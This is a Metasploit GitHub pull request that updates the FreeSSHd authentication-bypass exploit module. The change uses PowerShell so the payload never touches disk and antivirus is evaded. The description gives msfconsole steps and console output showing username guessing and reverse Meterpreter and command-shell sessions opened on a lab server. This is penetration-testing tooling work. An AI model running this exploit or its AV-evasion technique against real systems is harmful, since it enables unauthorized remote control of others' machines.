
Add documentation and some enhancement to freesshd_authbypass module #10977

Merged: 4 commits merged into rapid7:master on Nov 20, 2018

7 participants
Psi0NYX (Contributor) commented Nov 16, 2018

The freesshd_authbypass module was using a CmdStager that wrote the payload to disk and then executed it. This was causing the exploit to fail on systems where an antivirus was present. Using the Powershell mixin to execute the payload removed the need to write the payload to disk, so it gets past antivirus products.

There was no check being carried out at the start of the exploit method either, so I included a basic one.

Verification

  • Start msfconsole
  • Do : use exploit/windows/ssh/freesshd_authbypass
  • Do : set RHOST [target IP]
  • Do : set PAYLOAD [valid windows payload] if you want to use other payloads (x86 meterpreter by default)
  • Do : set LHOST [Your IP]
  • Do : set LPORT [valid port] (4444 by default)
  • Do : exploit
  • If target is vulnerable, a shell (meterpreter by default) should pop

Example with default payload (windows/meterpreter/reverse_tcp)

msf > use exploit/windows/ssh/freesshd_authbypass
msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131
RHOST => 192.168.80.131
msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138
LHOST => 192.168.80.138
msf exploit(windows/ssh/freesshd_authbypass) > exploit

[*] Started reverse TCP handler on 192.168.80.138:4444 
[*] 192.168.80.131:22 - Trying username '4Dgifts'
[*] 192.168.80.131:22 - Trying username 'EZsetup'
[*] 192.168.80.131:22 - Trying username 'OutOfBox'
[*] 192.168.80.131:22 - Trying username 'ROOT'
[*] Sending stage (179779 bytes) to 192.168.80.131
[*] Meterpreter session 2 opened (192.168.80.138:4444 -> 192.168.80.131:49166) at 2018-11-16 16:10:33 +0800

meterpreter > sysinfo
Computer        : SSH-TEST-SERVER
OS              : Windows 8.1 (Build 9600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 

Example with plain old reverse shell (windows/shell_reverse_tcp)

msf > use exploit/windows/ssh/freesshd_authbypass
msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131
RHOST => 192.168.80.131
msf exploit(windows/ssh/freesshd_authbypass) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138
LHOST => 192.168.80.138
msf exploit(windows/ssh/freesshd_authbypass) > set LPORT 4444
LPORT => 4444
msf exploit(windows/ssh/freesshd_authbypass) > exploit

[*] Started reverse TCP handler on 192.168.80.138:4444 
[*] 192.168.80.131:22 - Trying username '4Dgifts'
[*] 192.168.80.131:22 - Trying username 'EZsetup'
[*] 192.168.80.131:22 - Trying username 'OutOfBox'
[*] 192.168.80.131:22 - Trying username 'ROOT'
[*] Command shell session 1 opened (192.168.80.138:4444 -> 192.168.80.131:49167) at 2018-11-16 16:12:19 +0800



C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::5d22:f345:9ea1:a320%3
   IPv4 Address. . . . . . . . . . . : 192.168.80.131
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 

Tunnel adapter isatap.localdomain:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : localdomain

C:\Windows\system32>hostname
hostname
SSH-TEST-SERVER

C:\Windows\system32>

TODO

  • Add PowerShell as a separate target then set it as default

Psi0NYX referenced this pull request Nov 16, 2018: Small improvements to the freesshd_authbypass module #10970 (closed; 8 of 8 tasks complete)

Psi0NYX changed the title from "Enhanced module and added documentation." to "Add documentation and some enhancement to freesshd_authbypass module" on Nov 16, 2018

bwatters-r7 (Contributor) commented Nov 16, 2018

The sanity test failures are a temporary infrastructure issue on our side. The Travis failures look like some msftidy issues. You can check them here, but I recommend running msftidy locally before pushing. msftidy is in the metasploit-framework/tools directory:

tmoose@ubuntu:~/rapid7/metasploit-framework$ tools/dev/msftidy.rb 
Usage: msftidy.rb <directory or file>

While you are at it, it might be useful to check out the output from rubocop: https://github.com/rapid7/metasploit-framework/wiki/Using-Rubocop

Psi0NYX added some commits Nov 17, 2018

Green-m added the enhancement label Nov 19, 2018

bcoles (Contributor) commented Nov 20, 2018

Jenkins test this please

busterb self-assigned this Nov 20, 2018

busterb (Contributor) commented Nov 20, 2018

LGTM, thanks!

bcook-r7 merged commit b679bfa into rapid7:master Nov 20, 2018

2 of 3 checks passed:

  • Metasploit Automation - Sanity Test Execution: Failed to pass tests.
  • Metasploit Automation - Test Execution: Successfully completed all tests.
  • continuous-integration/travis-ci/pr: The Travis CI build passed.

bcook-r7 pushed a commit that referenced this pull request Nov 20, 2018

msjenkins-r7 added a commit that referenced this pull request Nov 20, 2018

busterb (Contributor) commented Nov 20, 2018

Release Notes

This updates the freesshd_authbypass exploit module to work more reliably in the presence of antivirus by avoiding writes to disk.
